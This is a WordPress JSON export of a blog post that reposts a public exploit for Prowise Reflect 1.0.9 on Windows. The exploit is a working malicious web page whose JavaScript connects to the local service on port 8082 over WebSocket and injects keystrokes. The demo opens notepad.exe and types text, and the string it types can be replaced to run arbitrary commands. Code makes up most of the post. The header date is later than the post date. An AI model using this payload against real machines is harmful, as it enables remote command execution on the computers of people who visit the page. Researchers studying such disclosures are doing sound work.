{"id":21195,"date":"2022-03-02T20:08:53","date_gmt":"2022-03-02T17:08:53","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166187\/prowisereflect109-inject.txt"},"modified":"2022-03-06T11:49:35","modified_gmt":"2022-03-06T08:19:35","slug":"prowise-reflect-1-0-9-remote-keystroke-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/prowise-reflect-1-0-9-remote-keystroke-injection\/","title":{"rendered":"Prowise Reflect 1.0.9 Remote Keystroke Injection"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: Prowise Reflect v1.0.9 &#8211; Remote Keystroke Injection<br \/>\n# Date: 30\/10\/2022<br \/>\n# Exploit Author: Rik Lutz<br \/>\n# Vendor Homepage: https:\/\/www.prowise.com\/<br \/>\n# Version: V1.0.9<br \/>\n# Tested on: Windows 10<\/p>\n<p dir=\"ltr\"># Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection.<br \/>\n# It works much like a rubber ducky attack, but either over the network (when port 8082 is exposed),<br \/>\n# or by visiting a malicious website. This POC contains the malicious webpage.<br \/>\n# Steps:<br \/>\n# 1. Start Prowise Reflect<br \/>\n# 2. Try to connect to a reflect server e.g. ygm7u6od<br \/>\n# 3. 
When it is connecting click exploit<br \/>\n# &#8211; Start menu will open, types notepad.exe and types hello world.<\/p>\n<p dir=\"ltr\">&lt;!DOCTYPE HTML&gt;<\/p>\n<p dir=\"ltr\">&lt;html&gt;<br \/>\n&lt;head&gt;<\/p>\n<p dir=\"ltr\">&lt;script type = &#8220;text\/javascript&#8221;&gt;<\/p>\n<p dir=\"ltr\">function wait(ms){<br \/>\nvar start = new Date().getTime();<br \/>\nvar end = start;<br \/>\nwhile(end &lt; start + ms) {<br \/>\nend = new Date().getTime();<br \/>\n}<br \/>\n}<\/p>\n<p dir=\"ltr\">function WebSocketTest() {<br \/>\nvar StateConnecting = new Boolean(false);<br \/>\nif (&#8220;WebSocket&#8221; in window) {<br \/>\n\/\/ Let us open a web socket<br \/>\nvar ws = new WebSocket(&#8220;ws:\/\/localhost:8082&#8221;);<\/p>\n<p dir=\"ltr\">ws.onopen = function() {<\/p>\n<p dir=\"ltr\">ws.send(&#8216;{&#8220;event&#8221;:&#8221;keyboard&#8221;, &#8220;key&#8221;:&#8221;super&#8221;}&#8217;);<br \/>\nwait(400);<br \/>\n\/\/character is slower<br \/>\n\/\/ ws.send(&#8216;{&#8220;event&#8221;:&#8221;keyboard&#8221;, &#8220;character&#8221;:&#8221;notepad.exe&#8221;}&#8217;};<\/p>\n<p dir=\"ltr\">\/\/ You can check for connecting state by sending {&#8220;event&#8221;:&#8221;setupRTCConnection&#8221;, &#8220;remoteName&#8221;:&#8221;a&#8221;} if the response is {&#8220;event&#8221;:&#8221;streamAvailable&#8221;} getIsConnecting == true<br \/>\nvar exploitcode = &#8220;notepad.exe&#8221;<br \/>\nfor (let i = 0; i &lt; exploitcode.length; i++) {<br \/>\nws.send(&#8216;{&#8220;event&#8221;:&#8221;keyboard&#8221;, &#8220;key&#8221;:&#8221;&#8216; + exploitcode[i] + &#8216;&#8221;}&#8217;);<br \/>\n}<\/p>\n<p dir=\"ltr\">wait(300);<br \/>\nws.send(&#8216;{&#8220;event&#8221;:&#8221;keyboard&#8221;, &#8220;key&#8221;:&#8221;enter&#8221;}&#8217;);<br \/>\nwait(2000);<br \/>\nexploitcode = &#8220;Hello world!&#8221;<\/p>\n<p dir=\"ltr\">for (let i = 0; i &lt; exploitcode.length; i++) {<br \/>\nws.send(&#8216;{&#8220;event&#8221;:&#8221;keyboard&#8221;, 
&#8220;key&#8221;:&#8221;&#8216; + exploitcode[i] + &#8216;&#8221;}&#8217;);<br \/>\n}<br \/>\nwait(200);<br \/>\n};<\/p>\n<p dir=\"ltr\">ws.onmessage = function (evt) {<br \/>\nvar received_msg = evt.data;<br \/>\n};<\/p>\n<p dir=\"ltr\">ws.onclose = function() {<\/p>\n<p dir=\"ltr\">\/\/ websocket is closed.<br \/>\nalert(&#8220;Connection is closed&#8230;&#8221;);<br \/>\n};<br \/>\n} else {<br \/>\n\/\/ The browser doesn&#8217;t support WebSocket<br \/>\nalert(&#8220;WebSocket NOT supported by your Browser!&#8221;);<br \/>\n}<br \/>\n}<br \/>\n&lt;\/script&gt;<\/p>\n<p dir=\"ltr\">&lt;\/head&gt;<\/p>\n<p dir=\"ltr\">&lt;body&gt;<br \/>\n&lt;div id = &#8220;sse&#8221;&gt;<br \/>\n&lt;a href = &#8220;javascript:WebSocketTest()&#8221;&gt;Exploit!&lt;\/a&gt;<br \/>\n&lt;\/div&gt;<\/p>\n<p dir=\"ltr\">&lt;\/body&gt;<br \/>\n&lt;\/html&gt;<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Prowise Reflect v1.0.9 &#8211; Remote Keystroke Injection # Date: 30\/10\/2022 # Exploit Author: Rik Lutz # Vendor Homepage: https:\/\/www.prowise.com\/ # Version: V1.0.9 # Tested on: Windows 10 # Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection. 
# Much like how a rubber ducky attack works but &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21195","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21195","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21195"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21195\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21195"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21195"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21195"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}